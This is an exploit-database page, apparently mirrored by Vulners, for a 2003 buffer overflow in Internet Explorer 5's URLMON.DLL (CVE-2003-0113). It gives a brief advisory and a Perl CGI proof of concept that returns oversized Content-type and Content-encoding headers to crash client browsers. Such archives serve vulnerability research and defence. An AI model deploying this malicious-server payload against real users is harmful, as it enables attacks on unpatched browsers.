Lucene search
+L

Microsoft Internet Explorer 5 - Remote 'URLMON.dll' Remote Buffer Overflow

🗓️ 23 Apr 2003 00:00:00Reported by Jouko PynnonenType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Vulnerability in Internet Explorer 5 allows buffer overflow via URLMON.DLL potentially executing code.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2003-0113
26 Apr 200304:00
cve
Cvelist
CVE-2003-0113
26 Apr 200304:00
cvelist
NVD
CVE-2003-0113
12 May 200304:00
nvd
OpenVAS
IE 5.01 5.5 6.0 Cumulative patch (890923)
3 Nov 200500:00
openvas
OpenVAS
Microsoft Internet Explorer 5.01, 5.5, 6.0 Cumulative Patch (890923, MS05-020)
3 Nov 200500:00
openvas
CERT
Buffer Overflow in URLMON.DLL
24 Apr 200300:00
cert
source: https://www.securityfocus.com/bid/7419/info

A vulnerability has been discovered in Microsoft Internet Explorer. Due to insufficient bounds checking performed by URLMON.DLL it may be possible for a malicious web server to trigger a buffer overflow. This could result in the execution of arbitrary code within the context of the client user.

#!/usr/bin/perl
#
# Name this file as "urlmon-bo.cgi"
$LONG="A"x300;
print "Content-type: $LONG\r\n";
print "Content-encoding: $LONG\r\n";
print "\r\n"; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8- -

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Nov 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.39367
33